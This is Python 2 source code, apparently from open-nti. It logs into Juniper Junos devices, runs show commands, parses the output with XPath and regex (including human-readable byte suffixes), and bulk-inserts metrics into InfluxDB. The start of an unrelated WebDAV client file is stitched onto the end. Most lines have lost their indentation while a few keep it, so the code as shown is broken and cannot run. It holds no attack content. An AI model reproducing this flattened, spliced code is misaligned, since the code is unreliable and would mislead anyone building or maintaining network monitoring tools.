# Remember... all rpc must have format=xml at execution time,
command_result = jdevice.rpc.cli(command_tmp, format="xml")
except RpcError as err:
rpc_error = err.__repr__()
logger.error("Error found on <%s> executing command: %s, error: %s:", jdevice.hostname, command ,rpc_error)
return False
if format == "text":
        # TODO: confirm that the root tag in command_result is <output>; if not, raise an exception and skip
return command_result.text
elif format == "xml":
return etree.tostring(command_result)
elif format == "txt-filtered":
operations = command.split("|")[1:]
result_tmp = command_result.text
lines=result_tmp.strip().split('\n')
for operation in operations:
logger.info("Processing <%s>", operation )
if re.search("count", operation, re.IGNORECASE):
result = "Count: %s lines" % len(lines)
logger.debug("Count result: <%s>", result )
return result
match = re.search("match (.*)", operation, re.IGNORECASE)
if match:
regex = match.group(1).strip()
logger.debug("Found regex: <%s>", regex )
lines_filtered = []
for line in lines:
if re.search(regex, line, re.IGNORECASE):
lines_filtered.append(line)
lines = lines_filtered
logger.debug("Filtered result:\n%s", "\n".join(lines_filtered) )
match = re.search("except (.*)", operation, re.IGNORECASE)
if match:
regex = match.group(1).strip()
logger.debug("Found regex: <%s>", regex )
lines_filtered = []
for line in lines:
if re.search(regex, line, re.IGNORECASE):
pass
else:
lines_filtered.append(line)
lines = lines_filtered
logger.debug("Filtered result:\n%s", "\n".join(lines_filtered) )
return "\n".join(lines)
def eval_variable_name(variable,**kwargs):
keys={}
if 'keys' in kwargs.keys():
        # Dicts are mutable and plain assignment copies the reference, not the value, so deep-copy it
keys=copy.deepcopy(kwargs['keys'])
if db_schema == 3:
for key in keys.keys():
variable = variable.replace("$"+key,"")
variable = variable.replace("..",".")
variable = variable.replace("$host","")
variable = re.sub(r"^\.", "", variable)
return variable, variable
if db_schema == 2:
for key in keys.keys():
variable = variable.replace("$"+key,"")
variable = variable.replace("..",".")
variable = variable.replace("$host","")
variable = re.sub(r"^\.", "", variable)
return "jnpr.collector", variable
else: # default db_schema (option 1) open-nti legacy
for key in keys.keys():
variable = variable.replace("$"+key,keys[key])
variable = variable.replace("$host",kwargs['host'])
if 'pid' in kwargs.keys():
variable = variable.replace("$pid",kwargs['pid'])
        # the host replacement should be moved elsewhere
return variable, variable
def eval_tag_name(variable,**kwargs):
for key in kwargs:
variable = variable.replace("$"+key,kwargs[key])
return variable
# Code added by Haofeng to deal with human-readable byte suffixes, especially
# for the Linux-based EVO system, on 5/7/2021
def eval_variable_value(value,**kwargs):
#logger.info('Get value %s', value)
    if (kwargs["type"] == "integer"):
        # Human-readable suffixes use binary multipliers (k/m/g/t)
        if value[-1] == "t":
            return int(float(value[0:-1])*1099511627776)
        elif value[-1] == "g":
            return int(float(value[0:-1])*1073741824)
        elif value[-1] == "m":
            return int(float(value[0:-1])*1048576)
        elif value[-1] == "k":
            return int(float(value[0:-1])*1024)
        else:
            return int(float(value))
elif kwargs["type"] == "string":
return value
else:
        logger.error('An unknown variable-type found: %s', kwargs["type"])
return value
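# Illustrative expected values for the suffix handling above (binary
# multipliers, matching the constants in eval_variable_value):
#   eval_variable_value("1.5g", type="integer") -> 1610612736  (1.5 * 2**30)
#   eval_variable_value("512k", type="integer") -> 524288      (512 * 2**10)
#   eval_variable_value("42",   type="integer") -> 42
#   eval_variable_value("up",   type="string")  -> "up"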
# This code won't work
# def eval_variable_value(value,**kwargs):
# if (kwargs["type"] == "integer"):
# value = re.sub('G','000000000',value)
# value = re.sub('M','000000',value)
# value = re.sub('K','000',value)
# return(int(float(value)))
# elif kwargs["type"] == "string":
# return value
# else:
# logger.error('An unkown variable-type found: %s', kwargs["type"])
# return value
def insert_datapoints(datapoints):
dbclient = InfluxDBClient(db_server, db_port, db_admin, db_admin_password)
dbclient.switch_database(db_name)
logger.info('Inserting into database the following datapoints:')
logger.info(pformat(datapoints))
response = dbclient.write_points(datapoints)
def get_metadata_and_add_datapoint(datapoints,**kwargs):
value_tmp = kwargs['value_tmp']
host = kwargs['host']
#latest_datapoints=kwargs['latest_datapoints']
match={}
if 'match' in kwargs.keys():
        # Dicts are mutable and plain assignment copies the reference, not the value, so deep-copy it
match=copy.deepcopy(kwargs['match'])
kpi_tags={}
if 'kpi_tags' in kwargs.keys():
        # Dicts are mutable and plain assignment copies the reference, not the value, so deep-copy it
kpi_tags=copy.deepcopy(kwargs['kpi_tags'])
# Need to double check if with latest improvements key variable is not used anymore
# key=''
# if 'key' in kwargs.keys():
# key=kwargs['key']
keys={}
if 'keys' in kwargs.keys():
        # Dicts are mutable and plain assignment copies the reference, not the value, so deep-copy it
keys=copy.deepcopy(kwargs['keys'])
for key_name in keys.keys():
kpi_tags[key_name] = keys[key_name]
# Resolving the variable name
value = convert_variable_type(value_tmp)
variable_name, kpi_tags['kpi'] = eval_variable_name(match["variable-name"],host=host,keys=keys)
# Calculating delta values (only applies for numeric values)
#delta = 0
#latest_value = ''
#if (type (value) != str):
#
# points=[]
# if (db_schema == 1):
# points = list(latest_datapoints.get_points(measurement = variable_name))
# elif (db_schema == 2):
# points = list(latest_datapoints.get_points(measurement = 'jnpr.collector', tags=kpi_tags))
# elif (db_schema == 3):
# points = list(latest_datapoints.get_points(measurement = kpi_tags['kpi'], tags=kpi_tags))
# else:
# logger.error("ERROR: Unknown db_schema: <%s>", db_schema)
#
# if len(points) == 1:
# latest_value = points[0]['value']
# delta = value - convert_variable_type(latest_value)
# logger.debug("Delta found : points <%s> latest_value <%s>", points,latest_value)
# elif len(points) == 0:
# delta = value
# logger.debug("No latest datapoint found for <%s>", kpi_tags)
# else:
# logger.error("ERROR: Latest datapoint query returns more than one match : <%s>", points)
#
# if type (value) == int:
# delta = int(delta)
# elif type (value) == float:
# delta = float(delta)
#else:
# delta = 'N/A'
# Getting all tags related to the kpi
# if 'tags' in match.keys():
# for tag in match['tags']:
    # tag_name = tag.keys()[0] # We assume that this dict only has one key
# tag_value = eval_tag_name(tag[tag_name],host=host,key=key)
# # this need to be updated when there is more than one key
# kpi_tags[tag_name] = tag_value
# Building the kpi and append it to the other kpis before database insertion
if type (value) != str:
kpi = {
"measurement": variable_name,
"fields": {
"value": value,
#"delta": delta
}
}
else:
kpi = {
"measurement": variable_name,
"fields": {
"value_str": value,
#"delta_str": delta
}
}
kpi["tags"] = kpi_tags
datapoints.append(copy.deepcopy(kpi))
#def parse_result(host,target_command,result,datapoints,latest_datapoints,kpi_tags):
def parse_result(host,target_command,result,datapoints,kpi_tags):
parser_found = False
for junos_parser in junos_parsers:
regex_command = junos_parser["parser"]["regex-command"]
if re.search(regex_command, target_command, re.IGNORECASE):
parser_found = True
matches = junos_parser["parser"]["matches"]
timestamp = str(int(datetime.today().strftime('%s')))
for match in matches:
try:
if match["method"] == "xpath":
# Load xml data
xml_data = etree.fromstring(result)
if match["type"] == "single-value":
try:
logger.debug('[%s]: Looking for a match: %s', host, match["xpath"])
if xml_data.xpath(match["xpath"]):
value_tmp = xml_data.xpath(match["xpath"])[0].text.strip()
logger.debug('[%s]: Match found for (%s) with value (%s)', host, match["xpath"],value_tmp)
#get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,latest_datapoints=latest_datapoints,host=host,kpi_tags=kpi_tags)
get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,host=host,kpi_tags=kpi_tags)
else:
logger.debug('[%s]: No match found: %s', host, match["xpath"])
if 'default-if-missing' in match.keys():
logger.debug('Inserting default-if-missing value: %s', match["default-if-missing"])
value_tmp = match["default-if-missing"]
#get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,latest_datapoints=latest_datapoints,host=host,kpi_tags=kpi_tags)
get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,host=host,kpi_tags=kpi_tags)
except Exception, e:
logger.info('[%s]: Exception found.', host)
logging.exception(e)
pass # Notify about the specific problem with the host BUT we need to continue with our list
elif match["type"] == "multi-value":
nodes = xml_data.xpath(match["xpath"])
for node in nodes:
                                # Look for all possible keys or fields to extract and use for variable naming
#key = node.xpath(match["loop"]["key"])[0].text.replace(" ","_").strip()
#print "the key is: " + key
keys = {}
keys_tmp = copy.deepcopy(match["loop"])
#print keys_tmp
if 'sub-matches' in keys_tmp.keys():
del keys_tmp['sub-matches']
for key_tmp in keys_tmp.keys():
keys[key_tmp]=node.xpath(keys_tmp[key_tmp])[0].text.replace(" ","_").strip()
#print keys
for sub_match in match["loop"]["sub-matches"]:
try:
logger.debug('[%s]: Looking for a sub-match: %s', host, sub_match["xpath"])
if node.xpath(sub_match["xpath"]):
if "regex" in sub_match:
value_tmp = node.xpath(sub_match["xpath"])[0].text.strip()
regex = sub_match["regex"]
text_matches = re.search(regex,value_tmp,re.MULTILINE)
if text_matches:
if text_matches.lastindex == len(sub_match["variables"]):
logger.debug('[%s]: We have (%s) matches with this regex %s', host, text_matches.lastindex,regex)
for i in range(0,text_matches.lastindex):
j=i+1
variable_name = eval_variable_name(sub_match["variables"][i]["variable-name"],host=host)
value_tmp = text_matches.group(j).strip()
                                                            # Apply the variable-type conversion if one is specified (pending: validate variable-type and its value)
if "variable-type" in sub_match["variables"][i]:
value_tmp = eval_variable_value(value_tmp, type=sub_match["variables"][i]["variable-type"])
#get_metadata_and_add_datapoint(datapoints=datapoints,match=sub_match["variables"][i],value_tmp=value_tmp,host=host,latest_datapoints=latest_datapoints,kpi_tags=kpi_tags,keys=keys)
get_metadata_and_add_datapoint(datapoints=datapoints,match=sub_match["variables"][i],value_tmp=value_tmp,host=host,kpi_tags=kpi_tags,keys=keys)
else:
                                                        logger.error('[%s]: More matches found on regex than variables specified in parser: %s', host, regex_command)
else:
logger.debug('[%s]: No matches found for regex: %s', host, regex)
else:
# xpath Attributes with attributes need to be special attention
attributes_matches = re.search('@',sub_match["xpath"])
value_tmp=""
if attributes_matches:
value_tmp = node.xpath(sub_match["xpath"])[0]
logger.debug('[%s]: Submatch found for (%s) with value (%s)', host, sub_match["xpath"],value_tmp)
else:
value_tmp = node.xpath(sub_match["xpath"])[0].text.strip()
logger.debug('[%s]: Submatch found for (%s) with value (%s)', host, sub_match["xpath"],value_tmp)
#get_metadata_and_add_datapoint(datapoints=datapoints,match=sub_match,value_tmp=value_tmp,latest_datapoints=latest_datapoints,host=host,kpi_tags=kpi_tags,keys=keys)
get_metadata_and_add_datapoint(datapoints=datapoints,match=sub_match,value_tmp=value_tmp,host=host,kpi_tags=kpi_tags,keys=keys)
else:
logger.debug('[%s]: No match found: %s', host, match["xpath"])
if 'default-if-missing' in sub_match.keys():
logger.debug('Inserting default-if-missing value: %s', sub_match["default-if-missing"])
value_tmp = sub_match["default-if-missing"]
#get_metadata_and_add_datapoint(datapoints=datapoints,match=sub_match,value_tmp=value_tmp,latest_datapoints=latest_datapoints,host=host,kpi_tags=kpi_tags,keys=keys)
get_metadata_and_add_datapoint(datapoints=datapoints,match=sub_match,value_tmp=value_tmp,host=host,kpi_tags=kpi_tags,keys=keys)
except Exception, e:
logger.info('[%s]: Exception found.', host)
logging.exception(e)
pass # Notify about the specific problem with the host BUT we need to continue with our list
else:
logger.error('[%s]: An unknown match-type found in parser with regex: %s', host, regex_command)
elif match["method"] == "regex": # we need to evaluate a text regex
                        ## For the 'show system processes extensive' command on EVO, FPC and RE are nodes.
                        ## We use single-value to deal with the RE output
if match["type"] == "single-value":
regex = match["regex"]
text_matches = re.search(regex,result,re.MULTILINE)
if text_matches:
if text_matches.lastindex == len(match["variables"]):
logger.debug('[%s]: We have (%s) matches with this regex %s', host, text_matches.lastindex,regex)
for i in range(0,text_matches.lastindex):
j=i+1
variable_name = eval_variable_name(match["variables"][i]["variable-name"],host=host)
value_tmp = text_matches.group(j).strip()
                                        # Apply the variable-type conversion if one is specified (pending: validate variable-type and its value)
if "variable-type" in match["variables"][i]:
value_tmp = eval_variable_value(value_tmp, type=match["variables"][i]["variable-type"])
#get_metadata_and_add_datapoint(datapoints=datapoints,match=match["variables"][i],value_tmp=value_tmp,latest_datapoints=latest_datapoints,host=host,kpi_tags=kpi_tags)
get_metadata_and_add_datapoint(datapoints=datapoints,match=match["variables"][i],value_tmp=value_tmp,host=host,kpi_tags=kpi_tags)
else:
                                    logger.error('[%s]: More matches found on regex than variables specified in parser: %s', host, regex_command)
else:
logger.info('[%s]: No matches found for regex: %s', host, regex)
                        ## For the 'show system processes extensive' command on EVO, FPC and RE are nodes.
                        ## We use multiple-value to deal with the FPC output, and use the PID to identify the daemons on different FPCs
# 17509 root 17509 20 0 9.806g 1.371g S 03:13:55 31.8 0.0 EvoAftManBt-mai{EvoAftManBt-mai}
# 17509 root 17567 20 0 9.806g 1.371g S 03:13:55 31.8 0.0 EvoAftManBt-mai{EvoAftManBt-mai}
# 17509 root 17568 20 0 9.806g 1.371g S 03:13:55 31.8 0.0 EvoAftManBt-mai{EvoAftManBt-mai}
# 17509 root 17570 20 0 9.806g 1.371g S 03:13:55 31.8 0.0 EvoAftManBt-mai{EvoAftManBt-mai}
# 17509 root 17592 20 0 9.806g 1.371g S 03:13:55 31.8 0.0 EvoAftManBt-mai{EvoAftManBt-mai}
# 17509 root 17593 20 0 9.806g 1.371g S 03:13:55 31.8 0.0 EvoAftManBt-mai{EvoAftManBt-mai}
# 17509 root 17594 20 0 9.806g 1.371g S 03:13:55 31.8 0.0 EvoAftManBt-mai{EvoAftManBt-mai}
# 16532 root 16532 20 0 8.655g 1.346g S 03:36:57 28.1 0.0 EvoAftManBt-mai{EvoAftManBt-mai}
# 16532 root 16650 20 0 8.655g 1.346g S 03:36:57 28.1 0.0 EvoAftManBt-mai{EvoAftManBt-mai}
# regex has to be: \s*([0-9]+)\s+\w+\s+([0-9]+)\s+\S+\s+\d*\S*\s+(\d*\S*)\s+(\d+\S*)\s+\S+\s+\S+\s+\S+\s+(\S+)\s+EvoAftManBt-mai{EvoAftManBt-mai}$
elif match["type"] == "multiple-value":
regex = match["regex"]
text_matches = re.findall(regex, result, re.MULTILINE) # tuples are returned
if text_matches:
text_matches_unique = []
for i in text_matches:
# if the PID = TID, it's the main process. We just monitor this main process
i = list(i)
if i[0] == i[1]:
# remove PID and TID from list
pid = i.pop(0)
i.pop(0)
text_matches_unique.append(i)
for text in text_matches_unique:
# ['17509', '9.806g', '1.371g', '0.0']
# ['16532', '8.655g', '1.346g', '0.0']
# ['17244', '9.738g', '1.346g', '5.6']
# ['17143', '9.928g', '1.384g', '5.9']
for i in range(len(text)):
                                        variable_name = eval_variable_name(match["variables"][i]["variable-name"],host=host,pid=pid)
                                        # re.findall() returns a list of tuples, so index into the
                                        # current tuple directly; the original text_matches.group()
                                        # call would raise AttributeError because findall() does not
                                        # return a match object
                                        value_tmp = text[i].strip()
                                        # Apply the variable-type conversion if one is specified (pending: validate variable-type and its value)
if "variable-type" in match["variables"][i]:
value_tmp = eval_variable_value(value_tmp, type=match["variables"][i]["variable-type"])
#get_metadata_and_add_datapoint(datapoints=datapoints,match=match["variables"][i],value_tmp=value_tmp,latest_datapoints=latest_datapoints,host=host,kpi_tags=kpi_tags)
get_metadata_and_add_datapoint(datapoints=datapoints,match=match["variables"][i],value_tmp=value_tmp,host=host,kpi_tags=kpi_tags)
else:
                            logger.error('[%s]: An unknown match-type found in parser with regex: %s', host, regex_command)
else:
                        logger.error('[%s]: An unknown method found in parser with regex: %s', host, regex_command)
except Exception, e:
logger.info('[%s]: Exception found.', host)
logging.exception(e)
pass # Notify about the specific problem with the host BUT we need to continue with our list
if parser_found:
            logger.info('[%s]: Parser found and processed, moving on to the next command.', host)
break
if (not(parser_found)):
logger.error('[%s]: ERROR: Parser not found for command: %s', host, target_command)
def collector(**kwargs):
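    # Per-host flow: resolve credentials, open a PyEZ Device (with retries),
    # grab version/platform tags via 'show version', execute every command
    # matching the host's tags, parse the results into datapoints, and finally
    # bulk-insert everything into InfluxDB together with open-nti's own
    # collection-time / collection-successful KPIs.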
for host in kwargs["host_list"]:
kpi_tags={}
#latest_datapoints={}
# if ((db_schema == 1) and (not(use_hostname))):
#if (not(use_hostname)):
# latest_datapoints = get_latest_datapoints(host=host)
# logger.debug("Latest Datapoints are:")
# logger.debug(pformat(latest_datapoints))
# kpi_tags = get_host_base_tags(host=host)
# Check host tag to identify what kind of connections will be used (ej junos / others / etc)
if "non_junos_devices" in hosts[host].split():
pass
# Reserved for future purposes
else: # By default it's a junos device
# We need to CATCH errors then print then but we need to continue with next host...
connected = False
logger.info('Connecting to host: %s', host)
target_commands = get_target_commands(host)
timestamp_tracking={}
timestamp_tracking['collector_start'] = int(datetime.today().strftime('%s'))
# Establish connection to hosts
user, passwd, authMethod,authKey_file = get_credentials(host)
if dynamic_args['test']:
#Open an emulated Junos device instead of connecting to the real one
_rpc_reply_dict = rpc_reply_dict()
_rpc_reply_dict['dir'] = BASE_DIR_INPUT
#jdev = mocked_device(_rpc_reply_dict)
# First collect all kpi in datapoints {} then at the end we insert them into DB (performance improvement)
connected = True
else:
if authMethod in "key":
jdev = Device(user=user, host=host, ssh_private_key_file=authKey_file, gather_facts=False, auto_probe=True, port=22)
elif authMethod in "enc_key":
jdev = Device(user=user, host=host, ssh_private_key_file=authKey_file, password=passwd, gather_facts=False, auto_probe=True, port=22)
else: # Default is
jdev = Device(user=user, host=host, password=passwd, gather_facts=False, auto_probe=True, port=22)
for i in range(1, max_connection_retries+1):
try:
jdev.open()
jdev.timeout = default_junos_rpc_timeout
connected = True
break
except Exception, e:
if i < max_connection_retries:
logger.error('[%s]: Connection failed %s time(s), retrying....', host, i)
time.sleep(1)
continue
else:
logging.exception(e)
connected = False # Notify about the specific problem with the host BUT we need to continue with our list
# First collect all kpi in datapoints {} then at the end we insert them into DB (performance improvement)
if connected:
datapoints = []
# By default execute show version in order to get version and platform as default tags for all kpi related to this host
kpi_tags = {}
target_command = 'show version | display xml'
#version_xpath = "//package-information/comment"
#by Haofeng, this //junos-version will work for both JUNOS and EVO
version_xpath = "//junos-version"
product_model_xpath = "//product-model"
logger.info('[%s]: Executing command: %s', host, target_command)
result = execute_command(jdev,target_command)
if result:
logger.debug('[%s]: Parsing command: %s', host, target_command)
xml_data = etree.fromstring(result)
value_tmp = xml_data.xpath(version_xpath)[0].text.strip()
version = re.search('\[(.*?)\]$', value_tmp)
if version:
kpi_tags['version'] = version.group(1)
else:
kpi_tags['version'] = 'unknown'
value_tmp = xml_data.xpath(product_model_xpath)[0].text.strip()
kpi_tags['product-model'] = convert_variable_type(value_tmp)
## Based on parameter defined in config file
if use_hostname:
hostname_xpth = "//host-name"
hostname_tmp = xml_data.xpath(hostname_xpth)[0].text.strip()
hostname = convert_variable_type(hostname_tmp)
logger.info('[%s]: Host will now be referenced as : %s', host, hostname)
host = hostname
# if (db_schema == 1):
# latest_datapoints = get_latest_datapoints(host=host)
# logger.info("Latest Datapoints are:")
# logger.info(pformat(latest_datapoints))
#latest_datapoints = get_latest_datapoints(host=host)
#logger.debug("Latest Datapoints are:")
#logger.debug(pformat(latest_datapoints))
else:
logger.info('[%s]: Host will be referenced as : %s', host, host)
kpi_tags['device']=host
kpi_tags['kpi']="base-info"
match={}
match["variable-name"]="base-info"
                    # We'll add a dummy kpi in order to have at least one fixed kpi with version/platform data.
#get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,latest_datapoints=latest_datapoints,host=host,kpi_tags=kpi_tags)
get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,host=host,kpi_tags=kpi_tags)
# Now we have all hosts tags that all host kpis will inherit
# For each target_command execute it, parse it, and insert values into DB
timestamp_tracking['collector_cli_start'] = int(datetime.today().strftime('%s'))
for target_command in target_commands:
logger.info('[%s]: Executing command: %s', host, target_command)
# Execute rpc/command on host and get result
result = execute_command(jdev,target_command)
if result:
logger.debug('[%s]: Parsing command: %s', host, target_command)
#parse_result(host,target_command,result,datapoints,latest_datapoints,kpi_tags)
parse_result(host,target_command,result,datapoints,kpi_tags)
time.sleep(delay_between_commands)
try:
jdev.close()
time.sleep(0.5)
except Exception, e:
                    print "ERROR: Something went wrong while closing the connection with the device"
logging.exception(e)
timestamp_tracking['collector_cli_ends'] = int(datetime.today().strftime('%s'))
logger.info('[%s]: timestamp_tracking - CLI collection %s', host, timestamp_tracking['collector_cli_ends']-timestamp_tracking['collector_cli_start'])
timestamp_tracking['collector_ends'] = int(datetime.today().strftime('%s'))
# Add open-nti internal kpi
collection_time = timestamp_tracking['collector_ends']-timestamp_tracking['collector_start']
#kpi_tags['device']=host
kpi_tags['stats']="collection-time"
match={}
match["variable-name"]="open-nti-stats"
value_tmp =collection_time
                # Add an open-nti internal kpi recording how long this host's collection took.
#get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,latest_datapoints=latest_datapoints,host=host,kpi_tags=kpi_tags)
get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,host=host,kpi_tags=kpi_tags)
#kpi_tags['device']=host
kpi_tags['stats']="collection-successful"
match={}
match["variable-name"]="open-nti-stats"
value_tmp = 1
                # Add an open-nti internal kpi marking this host's collection as successful.
#get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,latest_datapoints=latest_datapoints,host=host,kpi_tags=kpi_tags)
get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,host=host,kpi_tags=kpi_tags)
if datapoints: # Only insert datapoints if there is any :)
insert_datapoints(datapoints)
logger.info('[%s]: timestamp_tracking - total collection %s', host, collection_time)
else:
                logger.error('[%s]: Skipping host due to a connectivity issue', host)
datapoints = []
#latest_datapoints = get_latest_datapoints(host=host)
# By default execute show version in order to get version and platform as default tags for all kpi related to this host
kpi_tags['device']=host
kpi_tags['stats']="collection-failure"
match={}
match["variable-name"]="open-nti-stats"
value_tmp = 1
                # Add an open-nti internal kpi marking this host's collection as failed.
#get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,latest_datapoints=latest_datapoints,host=host,kpi_tags=kpi_tags)
get_metadata_and_add_datapoint(datapoints=datapoints,match=match,value_tmp=value_tmp,host=host,kpi_tags=kpi_tags)
if datapoints: # Only insert datapoints if there is any :)
insert_datapoints(datapoints)
################################################################################################
################################################################################################
################################################################################################
# SCRIPT STARTS HERE
################################################################################################
# Create and Parse Arguments
################################################################################################
if getattr(sys, 'frozen', False):
# frozen
BASE_DIR = os.path.dirname(sys.executable)
else:
# unfrozen
BASE_DIR = os.path.dirname(os.path.realpath(__file__))
BASE_DIR_INPUT = BASE_DIR + "/data/"
full_parser = argparse.ArgumentParser()
full_parser.add_argument("--tag", nargs='+', help="Collect data from hosts that matches the tag")
full_parser.add_argument("-c", "--console", action='store_true', help="Console logs enabled")
full_parser.add_argument("-t", "--test", action='store_true', help="Use emulated Junos device")
full_parser.add_argument("-s", "--start", action='store_true', help="Start collecting (default 'no')")
full_parser.add_argument("-i", "--input", default= BASE_DIR_INPUT, help="Directory where to find input files")
dynamic_args = vars(full_parser.parse_args())
## Change BASE_DIR_INPUT if we are in "test" mode
if dynamic_args['test']:
BASE_DIR_INPUT = dynamic_args['input']
################################################################################################
# Loading YAML Default Variables
###############################################################################################
default_variables_yaml_file = BASE_DIR_INPUT + "open-nti.variables.yaml"
default_variables = {}
try:
with open(default_variables_yaml_file) as f:
default_variables = yaml.load(f)
except Exception, e:
    # `logger` is not defined yet at this point (it is created further below),
    # so log through the logging module directly
    logging.error('Error importing default variables file: %s', default_variables_yaml_file)
logging.exception(e)
sys.exit(0)
db_schema = default_variables['db_schema']
db_server = default_variables['db_server']
db_port = default_variables['db_port']
db_name = default_variables['db_name']
db_admin = default_variables['db_admin']
db_admin_password = default_variables['db_admin_password']
db_user = default_variables['db_user']
db_user_password = default_variables['db_user_password']
max_connection_retries = default_variables['max_connection_retries']
max_collector_threads = default_variables['max_collector_threads']
delay_between_commands = default_variables['delay_between_commands']
logging_level = default_variables['logging_level']
default_junos_rpc_timeout = default_variables['default_junos_rpc_timeout']
use_hostname = default_variables['use_hostname']
################################################################################################
# Validate Arguments
###############################################################################################
tag_list = []
### Known and fixed arguments
if dynamic_args['tag']:
tag_list = dynamic_args['tag']
else:
tag_list = [ ".*" ]
if not(dynamic_args['start']):
    # `logger` is not defined yet here either; use the logging module directly
    logging.error('Missing <start> option, so nothing to do')
sys.exit(0)
################################################################################################
# open-nti starts here start
################################################################################################
# Setting up logging directories and files
timestamp = time.strftime("%Y-%m-%d", time.localtime(time.time()))
log_dir = BASE_DIR + "/" + default_variables['log_dir']
logger = logging.getLogger("_open-nti_")
if not os.path.exists(log_dir):
os.makedirs(log_dir, 0755)
formatter = '%(asctime)s %(name)s %(levelname)s %(threadName)-10s: %(message)s'
logging.basicConfig(filename=log_dir + "/"+ timestamp + '_open-nti.log',level=logging_level,format=formatter, datefmt='%Y-%m-%d %H:%M:%S')
if dynamic_args['console']:
logger.info("Console logs enabled")
console = logging.StreamHandler()
console.setLevel (logging.DEBUG)
logging.getLogger('').addHandler(console)
###############
# LOAD all credentials in a dict
credentials_yaml_file = BASE_DIR_INPUT + default_variables['credentials_file']
credentials = {}
logger.debug('Importing credentials file: %s ',credentials_yaml_file)
try:
with open(credentials_yaml_file) as f:
credentials = yaml.load(f)
except Exception, e:
logger.error('Error importing credentials file: %s', credentials_yaml_file)
# logging.exception(e)
sys.exit(0)
# LOAD all hosts with their tags in a dic
hosts_yaml_file = BASE_DIR_INPUT + default_variables['hosts_file']
hosts = {}
logger.debug('Importing host file: %s ',hosts_yaml_file)
try:
with open(hosts_yaml_file) as f:
hosts = yaml.load(f)
except Exception, e:
logger.error('Error importing host file: %s', hosts_yaml_file)
#logging.exception(e)
sys.exit(0)
# LOAD all commands with their tags in a dict
commands_yaml_file = BASE_DIR_INPUT + default_variables['commands_file']
commands = []
logger.debug('Importing commands file: %s ',commands_yaml_file)
with open(commands_yaml_file) as f:
try:
for document in yaml.load_all(f):
commands.append(document)
except Exception, e:
logger.error('Error importing commands file: %s', commands_yaml_file)
# logging.exception(e)
sys.exit(0)
general_commands = commands[0]
# LOAD all parsers
junos_parsers = []
junos_parsers_yaml_files = os.listdir(BASE_DIR + "/" + default_variables['junos_parsers_dir'])
logger.debug('Importing junos parsers file: %s ',junos_parsers_yaml_files)
for junos_parsers_yaml_file in junos_parsers_yaml_files:
try:
with open(BASE_DIR + "/" + default_variables['junos_parsers_dir'] + "/" + junos_parsers_yaml_file) as f:
junos_parsers.append(yaml.load(f))
except Exception, e:
logger.error('Error importing junos parser: %s', junos_parsers_yaml_file)
# logging.exception(e)
pass
pfe_parsers = []
pfe_parsers_yaml_files = os.listdir(BASE_DIR + "/" + default_variables['pfe_parsers_dir'])
logger.debug('Importing pfe parsers file: %s ',pfe_parsers_yaml_files)
for pfe_parsers_yaml_file in pfe_parsers_yaml_files:
try:
with open(BASE_DIR + "/" + default_variables['pfe_parsers_dir'] + "/" + pfe_parsers_yaml_file) as f:
pfe_parsers.append(yaml.load(f))
except Exception, e:
logger.error('Error importing pfe parser: %s', pfe_parsers_yaml_file)
# logging.exception(e)
pass
if __name__ == "__main__":
logger.debug('Getting hosts that matches the specified tags')
# Get all hosts that matches with the tags
target_hosts = get_target_hosts()
logger.debug('The following hosts are being selected: %s', target_hosts)
# Test DB connectivity before starting to collect data
if check_db_status():
# Create a list of jobs and then iterate through
# the number of threads appending each thread to
# the job list
target_hosts_lists = [target_hosts[x:x+len(target_hosts)/max_collector_threads+1] for x in range(0, len(target_hosts), len(target_hosts)/max_collector_threads+1)]
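        # Example (Python 2 integer division): with 10 target hosts and
        # max_collector_threads = 4 the chunk size is 10/4 + 1 = 3, so the
        # hosts were split above into lists of 3, 3, 3 and 1, each handled
        # by its own collector thread below.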
jobs = []
i=1
for target_hosts_list in target_hosts_lists:
logger.info('Collector Thread-%s scheduled with following hosts: %s', i, target_hosts_list)
thread = threading.Thread(target=collector, kwargs={"host_list":target_hosts_list})
jobs.append(thread)
i=i+1
# Start the threads
for j in jobs:
j.start()
# Ensure all of the threads have finished
for j in jobs:
j.join()
|
client.py
|
# -*- coding: utf-8 -*-
import pycurl
import os
import shutil
import threading
import lxml.etree as etree
from io import BytesIO
from re import sub
from webdav.connection import *
from webdav.exceptions import *
from webdav.urn import Urn
try:
from urllib.parse import unquote
except ImportError:
from urllib import unquote
__version__ = "1.0.10-carlos"
def listdir(directory):
file_names = list()
for filename in os.listdir(directory):
file_path = os.path.join(directory, filename)
if os.path.isdir(file_path):
filename = "{filename}{separate}".format(filename=filename, separate=os.path.sep)
file_names.append(filename)
return file_names
def add_options(request, options):
for (key, value) in options.items():
if value is None:
continue
try:
request.setopt(pycurl.__dict__[key], value)
except TypeError:
raise OptionNotValid(key, value)
except pycurl.error as e:
raise OptionNotValid(key, value)
def get_options(type, from_options):
_options = dict()
for key in type.keys:
key_with_prefix = "{prefix}{key}".format(prefix=type.prefix, key=key)
if key not in from_options and key_with_prefix not in from_options:
_options[key] = ""
elif key in from_options:
_options[key] = from_options.get(key)
else:
_options[key] = from_options.get(key_with_prefix)
return _options
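# A minimal sketch of the resolution rules above, using a hypothetical
# settings type (WebDAVSettings and ProxySettings follow the same shape:
# a `prefix` string plus a `keys` collection):
#
#   class _DemoSettings(object):
#       prefix = "webdav_"
#       keys = ("hostname", "login", "password")
#
#   get_options(type=_DemoSettings,
#               from_options={"hostname": "https://example.com",
#                             "webdav_login": "alice"})
#   -> {"hostname": "https://example.com",  # plain key wins when present
#       "login": "alice",                   # otherwise the prefixed key is used
#       "password": ""}                     # missing keys default to ""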
class Client(object):
root = '/'
large_size = 2 * 1024 * 1024 * 1024
http_header = {
'list': ["Accept: */*", "Depth: 1"],
'free': ["Accept: */*", "Depth: 0", "Content-Type: text/xml"],
'copy': ["Accept: */*"],
'move': ["Accept: */*"],
'mkdir': ["Accept: */*", "Connection: Keep-Alive"],
